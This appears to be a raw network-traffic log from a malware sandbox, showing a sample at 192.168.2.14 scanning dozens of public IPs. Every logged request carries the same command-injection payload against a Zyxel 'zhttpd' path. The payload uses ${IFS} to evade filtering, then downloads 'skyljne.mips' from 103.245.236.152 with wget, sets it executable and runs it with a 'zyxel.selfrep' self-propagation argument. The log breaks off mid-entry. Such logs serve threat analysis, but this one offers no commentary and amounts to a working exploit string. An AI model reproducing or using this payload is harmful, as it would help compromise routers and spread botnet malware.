                                      Jan 14, 2024 15:50:40.139911890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2647192.168.2.1434936119.164.103.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139950991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2648192.168.2.1435846148.20.152.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140000105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2649192.168.2.144826218.225.201.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140041113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2650192.168.2.1455518173.99.143.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140065908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2651192.168.2.143481441.164.164.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140110970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2652192.168.2.145652074.121.32.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140162945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2653192.168.2.144456265.99.156.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140193939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2654192.168.2.1440204106.223.82.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140240908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2655192.168.2.145880289.4.255.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140275002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2656192.168.2.1443106204.20.135.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140312910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2657192.168.2.145769019.43.77.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140336037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2658192.168.2.143698094.116.86.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140394926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2659192.168.2.144933459.92.194.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140443087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2660192.168.2.144959212.36.159.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140482903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2661192.168.2.1445034136.57.86.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140501976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2662192.168.2.143813644.83.101.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140549898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2663192.168.2.144646471.7.15.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140599966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2664192.168.2.144977067.226.224.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140644073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2665192.168.2.143883298.161.72.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140708923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2666192.168.2.144842257.213.124.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140744925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2667192.168.2.145312447.146.24.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140784979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2668192.168.2.144065098.223.131.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140805960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2669192.168.2.1454656110.127.124.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140857935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2670192.168.2.1434474102.141.246.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140893936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2671192.168.2.1440730150.208.203.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140925884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2672192.168.2.145604851.191.150.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.140978098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2673192.168.2.144556667.160.244.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141006947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2674192.168.2.1441772188.24.89.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141048908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2675192.168.2.1438560179.117.63.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141120911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2676192.168.2.1444836145.207.246.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141138077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2677192.168.2.1440408208.135.115.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141168118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2678192.168.2.1452690138.199.80.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141211033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2679192.168.2.144750252.145.205.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141241074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2680192.168.2.145639238.197.108.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141273975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2681192.168.2.1456148120.58.100.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141328096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2682192.168.2.144925458.217.197.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141377926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2683192.168.2.1439204150.18.48.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141405106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2684192.168.2.144384674.152.18.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141455889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2685192.168.2.1433958148.31.247.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141505003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2686192.168.2.145495824.192.161.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141546011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2687192.168.2.143698683.239.5.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141577959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2688192.168.2.143356864.172.140.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141617060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2689192.168.2.1456038113.161.232.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141664982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2690192.168.2.1460068164.196.58.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141702890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2691192.168.2.1450012189.181.84.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141729116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2692192.168.2.143739627.202.129.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141779900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2693192.168.2.146055897.114.27.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141817093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2694192.168.2.144995646.231.147.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141844034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2695192.168.2.145356249.204.31.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141901016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2696192.168.2.1434366144.99.13.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141946077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2697192.168.2.1455542192.223.42.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.141979933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2698192.168.2.143434071.128.80.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142035007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2699192.168.2.1452558108.141.170.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142060995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2700192.168.2.1437904193.208.163.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142113924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2701192.168.2.145580038.62.230.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142158985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2702192.168.2.145557896.217.254.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142179966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2703192.168.2.1439332163.123.88.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142227888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2704192.168.2.1450554114.217.103.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142275095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2705192.168.2.1439246206.60.148.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142296076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2706192.168.2.1436824136.5.32.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142344952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2707192.168.2.1437812210.32.156.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142402887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2708192.168.2.145877035.52.88.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.142422915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2709192.168.2.1434800200.145.242.228443
                                      TimestampBytes transferredDirectionData
